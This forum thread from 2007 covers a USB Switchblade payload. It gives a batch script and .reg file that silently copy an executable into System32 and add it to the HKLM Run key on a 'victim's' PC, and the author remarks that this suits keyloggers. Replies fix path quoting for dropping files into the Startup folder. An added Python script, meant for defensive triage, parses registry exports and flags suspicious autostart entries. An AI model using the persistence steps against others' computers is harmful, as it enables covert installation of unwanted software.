AndyzBong Posted July 9, 2007

So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade, and I decided that I wanted one of my particular payloads to be dumped in my "victim's" Startup folder (for execution upon the next reboot).

Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxes that say "Your system is critically running low on virtual memory!" Hence the program is named VirtuMem.exe.

It all seemed simple enough, right?

    copy H:\WIPCMD\VirtuMem.exe C:\Documents and Settings\All Users\Start Menu\Programs\Startup

Nope! Incorrect syntax. So I tried

    copy H:\WIPCMD\VirtuMem.exe C:\

and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this.

Anywho, if you are familiar with SysInternals' freeware program called AutoRuns, then you know that applications such as AIM, QuickTime, Symantec, and other software vendors' programs can autorun upon login without having a .LNK file in the Startup folder. My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so:

    Windows Registry Editor Version 5.00

    ; REG_SZ data in a .reg file uses backslash as an escape character, so path separators are written as \\
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "VirtuMem"="C:\\WINDOWS\\SYSTEM32\\VirtuMem.exe"

and then add the following code to my go.cmd file:

    rem Log the start of this payload to the Switchblade log (paths are relative to the USB drive root)
    @echo [START AutoRun VirtuMem via RegEdit] >> Documents\logfiles\%computername%.log 2>&1
    echo. >> Documents\logfiles\%computername%.log 2>&1
    rem Drop the executable into System32 and register it under HKLM\...\Run
    rem /y suppresses the overwrite prompt, /s makes regedit import silently
    copy /y H:\WIPCMD\VirtuMem.exe C:\WINDOWS\SYSTEM32
    regedit.exe /s WIPCMD\startup.reg
    echo. >> Documents\logfiles\%computername%.log 2>&1
    @echo [END AutoRun VirtuMem via RegEdit] >> Documents\logfiles\%computername%.log 2>&1

I just figure it was a neat trick that I would share with the community.

This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. This could also be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them).

Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far this code is untested.

In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info, let me know. This code is for Windows XP Pro (as far as I know).

Peace.
- AndyzBong
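The post relies on the Run key being executed at logon without anything visible in the Startup folder, which is exactly why AutoRuns (and anyone doing incident response) enumerates those keys. As an added example, not code from the original post or from the Switchblade project, the script below parses a Registry Editor 5.00 export such as startup.reg or the output of `reg export`, pulls out every value under the Run/RunOnce family of keys, and applies a few triage heuristics: unquoted image paths containing spaces (the same quoting problem discussed in this thread), bare filenames resolved through the search path, and images in user-writable locations. The sample export, the value names, the paths and the heuristics are all constructed for the example; note that an entry like the thread's VirtuMem one, a plain path into System32, is listed but not flagged by path heuristics alone, so the reviewer still has to check the binary itself.

```python
"""Offline triage of autostart (Run/RunOnce) values in a Windows .reg export.

Added example; the SAMPLE_REG text is constructed, not a real export.
"""
import re

# Keys that Explorer/winlogon execute at logon, the locations AutoRuns lists first.
RUN_KEY_SUFFIXES = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\currentversion\runonce",
    r"\microsoft\windows\currentversion\runonceex",
    r"\microsoft\windows\currentversion\runservices",
    r"\microsoft\windows\currentversion\runservicesonce",
    r"\microsoft\windows\currentversion\policies\explorer\run",
)
# Path fragments an ordinary user can write to (assumed heuristic list).
USER_WRITABLE_HINTS = ("%temp%", "%tmp%", "%appdata%", "%userprofile%",
                       "\\documents and settings\\", "\\users\\", "\\temp\\")
# First token that looks like an executable, used for unquoted command lines.
EXE_RE = re.compile(r"^(.*?\.(?:exe|com|bat|cmd|scr|pif|vbs|js))(?:\s|$)", re.IGNORECASE)

# Constructed sample export: value names and paths are made up for this example.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"VirtuMem"="C:\\WINDOWS\\SYSTEM32\\VirtuMem.exe"
"WeatherBug"="C:\\Program Files\\AWS\\WeatherBug\\Weather.exe 1"
"Updater"=hex(2):25,00,54,00,45,00,4d,00,50,00,25,00,\
  5c,00,75,00,2e,00,65,00,78,00,65,00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Helper"="helper.exe /quiet"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Old"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Foo]
"DisplayName"="Foo 1.0"
'''


def _join_continuations(text):
    """Regedit wraps long hex() data with a trailing backslash; rejoin those lines."""
    lines, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        lines.append(buf + line)
        buf = ""
    if buf:
        lines.append(buf)
    return lines


def _decode_data(data):
    """Turn the right-hand side of a .reg value line into a Python value."""
    if data.startswith('"') and data.endswith('"'):
        # REG_SZ: regedit escapes backslash and double quote with a backslash.
        return re.sub(r"\\(.)", r"\1", data[1:-1])
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", data)
    if m:
        kind = int(m.group(1) or 3)                 # plain "hex:" is REG_BINARY (3)
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        if kind in (2, 7):                          # REG_EXPAND_SZ / REG_MULTI_SZ are UTF-16LE
            return raw.decode("utf-16-le").rstrip("\x00")
        return raw
    return data                                     # "-" (delete value) or unknown syntax


def parse_reg(text):
    """Yield (key, value_name, data) for every value line in the export."""
    key = None
    for line in _join_continuations(text):
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if m and key is not None:
            name = m.group(1) if m.group(1) is not None else "(Default)"
            yield key, name, _decode_data(m.group(2))


def is_run_key(key):
    """True for Run/RunOnce-style keys under HKLM or HKCU (a leading '-' means delete key)."""
    k = key.lstrip("-").lower()
    return any(k.endswith(s) for s in RUN_KEY_SUFFIXES)


def image_path(command):
    """Pull the executable out of a Run value: quoted prefix, else first .exe-like token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = EXE_RE.match(command)
    return m.group(1) if m else command.split(" ", 1)[0]


def audit(text):
    """Return one record per autostart value, with heuristic flags for a reviewer."""
    findings = []
    for key, name, data in parse_reg(text):
        if not is_run_key(key) or not isinstance(data, str):
            continue
        rec = {"key": key, "name": name, "image": None, "flags": []}
        if key.startswith("-") or data == "-":
            rec["flags"].append("removes an autostart entry")
        else:
            img = rec["image"] = image_path(data)
            if not data.lstrip().startswith('"') and " " in img:
                rec["flags"].append("unquoted path containing spaces")
            if "\\" not in img:
                rec["flags"].append("bare filename, resolved via the search path")
            if any(h in img.lower() for h in USER_WRITABLE_HINTS):
                rec["flags"].append("image in a user-writable location")
        findings.append(rec)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f"{f['name']:<15} {f['image'] or '-':<45} {', '.join(f['flags']) or 'ok'}")
```

Run it against a real export (`reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg` on the host, then read that file instead of SAMPLE_REG); the heuristics only narrow the list, and anything left, including plain System32 paths, still needs a hash or signature check.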
GonZor Posted July 9, 2007

> It all seemed simple enough, right?
>
>     copy H:\WIPCMD\VirtuMem.exe C:\Documents and Settings\All Users\Start Menu\Programs\Startup
>
> Nope! Incorrect syntax. So I tried
>
>     copy H:\WIPCMD\VirtuMem.exe C:\
>
> and... tada! Either my syntax is wrong (please feel free to enlighten me)...

You were missing the quotes from around your destination. It should have read:

    copy "H:\WIPCMD\VirtuMem.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" /y

Notice the quotes around the source and destination paths. You don't need them around the source because there are no spaces, but I do it anyway. I also added a /y switch to copy the file even if it exists (just to make sure it's your file, not a dummy file).
AndyzBong (Author) Posted July 9, 2007

Enlightened about the quotations; gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.
GonZor Posted July 9, 2007

> this is why I am a Hackling and you are a Zombie.

As long as I'm not a penguin it's ok by me :P

Just remember /? is your friend. Some of the explanations are very basic, but most of them are quite useful.